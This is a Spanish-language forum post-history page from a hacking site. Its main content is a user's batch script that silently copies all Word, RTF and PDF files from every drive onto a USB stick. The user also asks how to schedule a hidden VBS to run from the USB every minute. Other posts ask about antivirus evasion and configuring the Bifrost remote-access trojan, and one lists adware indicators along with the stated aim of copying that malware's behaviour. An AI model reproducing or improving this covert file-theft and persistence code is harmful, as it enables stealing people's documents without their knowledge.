elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14
81  Programación / Scripting / Re: ayuda a simplificar bat en: 11 Octubre 2013, 22:17 pm
use
Código:
schtasks /query
para ver las tareas programadas
tengo dos creadas por mi que quiero eliminar
copiar
Copiar G
la tarea copiar la borre usando
Código:
SCHTASKS /Delete /TN copiar
pero cuando intento con
Código:
SCHTASKS /Delete /TN Copiar G
y
Código:
SCHTASKS /Delete /TN Copiar_G
no me funciono
82  Programación / Scripting / Re: ayuda a simplificar bat en: 11 Octubre 2013, 21:34 pm
el error del espacio luego del for no lo iba notado el segundo error si.

ese codigo me creo un bucle infinito alguien sabe como borrarlo ya intenete con

Código:
@echo off
SCHTASKS /tn copiar /End
pause
SCHTASKS /TR "copiar" /delete

y otras variantes pero no funciona
83  Programación / Scripting / Re: ayuda a simplificar bat en: 11 Octubre 2013, 20:35 pm
cuando ejecuto manualmente el archivo run.cmd con este codigo
Código:
For %%r in (D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
if exist %%r:\Hide\start.vbs (
SCHTASKS /create /SC "MINUTE" /MO "3" /tn "Copiar %%r" /TR "WScript.exe \" %%r\Hide\start.vbs\""))
me aparece esto
error al cargar la secuencia de comando "C:\windows\system32\ G:\start.vbs (el nombre del archivo o  el nombre de  directorio o la sintaxis de la etiqueta del volumen no son correctos)
84  Programación / Scripting / Re: ayuda a simplificar bat en: 10 Octubre 2013, 20:03 pm
gracias amigos pero ningun codigo me funciona

tengo este guardado como run.cm en formato ANSI pero no funciona
Código:
@echo off
SCHTASKS /create /SC MINUTE /MO 1 /tn copiar /TR E:\start.vbs

intente con este de EleKtro H@cker pero tampoco funciona

Código:
REM Ejemplo:
Set "DriveLetter=%~d0"
Echo %DriveLetter%
 
SCHTASKS /create /SC "MINUTE" /MO "1" /tn "Copiar %DriveLetter%" /TR "WScript.exe \"%DriveLetter%\start.vbs\""

probe con el de Segadorfelix pero tampoco funciona
Código:
For %%r in (D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
if exist %%r:\start.vbs (
SCHTASKS /create /SC "MINUTE" /MO "1" /tn "Copiar %%r" /TR "WScript.exe \" %%r\start.vbs\""))

alguna idea porque ninguno me funciona?
85  Programación / Scripting / Re: ayuda a simplificar bat en: 9 Octubre 2013, 18:54 pm
el problema es que la ruta del archivo start.vbs es F:\Hide\start.vbs  pero cuando la usb tenga asiganda una letra diferente el run.cmd no lo encontrara

probando tu codigo

gracias
86  Programación / Scripting / Re: ayuda a simplificar bat en: 9 Octubre 2013, 18:17 pm
totalmente agradecido

como quito el mensaje "precione una tecla para continuar..."

y otra pregunta

a este codigo
Código:
@echo off
SCHTASKS /create /SC MINUTE /MO 1 /tn copiar /TR F:\Hide\start.vbs

como le creo una variable para la letra de la usb, u otro mecanismo que ejecute el archivo vbs?
87  Programación / Scripting / ayuda a simplificar bat en: 8 Octubre 2013, 19:31 pm
hola amigos tengo este bat

Código:
(FOR /R "A:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "B:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "C:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "D:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "E:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "F:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "G:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "H:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "I:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "J:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "K:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "L:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "M:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "N:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "O:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "P:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "Q:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "R:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "S:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "T:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "U:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "V:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "W:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "X:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "Y:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))
(FOR /R "Z:\" %%a IN (*.doc,*.d0cx,*.rtf,*.pdf)  DO  (copy /y "%%a" "%1\trabajos\"))

el cual copia todos los archivos de los discos del pc a la usb donde esta el bat

estoy usando todas las letras del abecedario para buscar todos los discos del pc y uso "%1\trabajos\" para que se copien a la usb donde esta el bat
 
alguien me puede ayudar a simplificar mi codigo


gracias por sus respuestas
88  Seguridad Informática / Análisis y Diseño de Malware / Re: Expongamos opiniones de diseño :) en: 3 Septiembre 2013, 18:44 pm
hola amigo como vas con el cliente ya termino el proyecto? como corre? lo detectan los antivirus?
89  Seguridad Informática / Hacking / Re: Bifrost en: 2 Septiembre 2013, 05:16 am
hola amigos me pueden ayudar a configurar el no-ip pues no entiendo


90  Seguridad Informática / Análisis y Diseño de Malware / NTREDIRECT.DLL (Delta search) en: 24 Agosto 2013, 20:00 pm
NTREDIRECT.DLL

Ubicación predeterminada:% APPDATA% \ BabSolution \ Shared \ NTRedirect.dll


NTREDIRECT.DLL es un Adware.Babylon.A, Trojan.Agent

NTREDIRECT.DLL Hash: MD5: 2e1d99d838a2e104186954705f467317

Código:
Registro:
HKLM \ Software \ Classes \ CLSID \ {2C141B4C-B5BA-4E89-BE73-F71ED4A208CF} \ InprocServer32 \: "% Archivos de programa% \ mixidj \ mixidj \ 1.8.18.8 \ mixidjApp.dll"
HKLM \ Software \ Classes \ CLSID \ {4D6A9BBF-402C-4301-B1EF-28D04F71D761} \ InprocServer32 \: "% Archivos de programa% \ mixidj \ mixidj \ 1.8.18.8 \ bh \ mixidj.dll"
HKLM \ Software \ Classes \ CLSID \ {C3F978C3-0594-4397-B8E6-3F9D9BE6A7B9} \ InprocServer32 \: "% Archivos de programa% \ mixidj \ mixidj \ 1.8.18.8 \ bh \ mixidj.dll"
HKLM \ Software \ Classes \ CLSID \ {CA9B9C89-4662-4ADC-9C23-A452BECD5D19} \ InprocServer32 \: "% Archivos de programa% \ mixidj \ mixidj \ 1.8.18.8 \ mixidjTlbr.dll"
HKLM \ Software \ Classes \ CLSID \ {F9221CC8-22DF-4CEF-B8ED-BA87F1F09878} \ InprocServer32 \: "% Archivos de programa% \ mixidj \ mixidj \ 1.8.18.8 \ mixidjEng.dll"
HKLM \ System \ CurrentControlSet \ Services \ BrowserDefendert \ ImagePath: "Common% APPDATA% \ BrowserDefender \ 2.6.1562.220 \ {c16c1ccb-1111-4e5c-a2f3-533ad2fec8e8} \ BrowserDefender.exe"
HKLM \ System \ CurrentControlSet \ Services \ DefaultTabSearch \ ImagePath: "% Archivos de programa% \ DefaultTab \ DefaultTabSearch.exe"
HKLM \ System \ CurrentControlSet \ Services \ RemoteEngineService \ ImagePath: "% Archivos de programa% \ VuuPC \ remoteengine.exe"
HKLM \ System \ CurrentControlSet \ Services \ VuuPCConnectivity \ ImagePath: "% Archivos de programa% \ VuuPC \ Connectivity.exe"
HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ NTRedirect: "% SYSDIR% \ rundll32.exe"% APPDATA% \ BabSolution \ Shared \ NTRedirect.dll "Ejecutar"
HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Windows \ AppInit_DLLs: "C: \ DOCUME ~ 1 \ Alluse ~ 1 \ aplic ~ 1 ~ 1 \ Ver \ 261562 ~ 1.220 \ {c16c1 ~ 1 \ Ver ~ 1.dll"


Código:
Carpetas:
% APPDATA% \ Mozilla \ Firefox \ Profiles \ gi17c3pt.default \ extensions \ ffxtlbr@babylon.com
% APPDATA% \ BabSolution
% APPDATA% \ mixidj
% Local AppData% \ Google \ Chrome \ User Data \ Default \ extensions \ kdidombaedgpfiiedeimiebkmbilgmlc
Local% APPDATA% \ avgchrome
%% Programas \ BrowserDefender
%% Programas \ VuuPC
Common% APPDATA% \ Babilonia
Common% APPDATA% \ BrowserDefender
% Archivos de programa% \ Mozilla Firefox \ Extensions
% Archivos de programa% \ DefaultTab
% Archivos de programa% \ mixidj
% Archivos de programa% \ VuuPC


Código:
Archivos:
% APPDATA% \ BabSolution \ Shared \ BabMaint.exe
% APPDATA% \ BabSolution \ Shared \ BUSolution.dll
% APPDATA% \ BabSolution \ Shared \ MixiDJ.ico
% APPDATA% \ BabSolution \ Shared \ NTRedirect.dll



alguien me puede ayudar a enteder el funcionamiento de este Malware me gustaria copiar su funcionamiento
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines